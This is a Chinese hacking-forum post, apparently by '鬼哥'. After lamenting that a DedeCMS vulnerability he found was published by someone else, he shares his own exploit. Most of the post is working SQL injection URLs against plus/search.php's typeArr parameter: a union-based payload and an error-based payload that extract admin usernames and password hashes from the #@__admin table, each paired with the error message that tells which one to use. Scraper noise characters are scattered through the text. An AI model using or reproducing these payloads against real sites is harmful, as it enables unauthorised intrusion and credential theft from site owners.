转载不加作者名的没JJ6 X. Z( i; B1 W# x
3 q; B; G4 ` l" }' u
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。4 T6 I# k' P3 [7 X3 e
5 H7 p& ]% l" n+ k& h6 N( D
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
4 n k y1 u- Y _3 T/ Y/ Y; b
" L/ X# a* y: G6 d我一般是这样测试的:- G2 R0 j4 ^; m2 `( b4 L' v
8 {- S7 g1 I$ ?; y
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
& S) G4 t! o0 U( \4 N8 d$ }- P: v$ c+ Q& U
转载不加作者名的没JJ2 D' a& q4 G! S( |/ T e8 i7 g
) ~- s, s! F" `作者:鬼哥3 ^: U8 g, ]% h3 v5 a% ~$ @
) u( \9 P7 }( Z + X4 n0 x4 X4 j$ G1 o$ h. A+ m0 X+ H
4 D4 P% |4 Y% }7 _3 L, a/ D
看结果如果提示; T+ ]9 E& T2 V* Q
B6 C+ I' g% s
Safe Alert: Request Error step 2 !
3 C0 M8 V& u0 M! z0 ^+ l! s3 n3 |7 e# }2 o
那么直接用下面的exp2 O5 s' x7 m6 N8 j9 q
2 z) `$ A- |+ n( l7 G9 |- z8 A1 Wxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a0 [- D! G+ C6 U3 ]1 |
7 j' N5 Z' A- P
; l! M% f* n a' v# S0 y
看结果如果提示
# ~; B9 P6 E# S6 w/ m, c* q2 |5 D7 b9 j0 M; v6 A" N/ o" ]6 U
Safe Alert: Request Error step 1 !
5 k/ i7 I% O2 X0 j0 Z; T8 t" _5 O2 E, t+ w
那么直接用下面的exp* @+ e% V, t, u+ e
6 g: x* ^- @7 }8 L$ ?2 E
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a' S) ^, b$ l$ b- C. o8 ]
: o2 V0 ]- B3 i8 m9 u. n: K
* I* R& Q2 D- @! m* {9 @1 {
如果正常显示证明漏洞不存在了。
" O6 A; L( _% O$ T' Y, O+ H2 i4 X0 m R" V# l3 C
转载不加作者名的没JJ |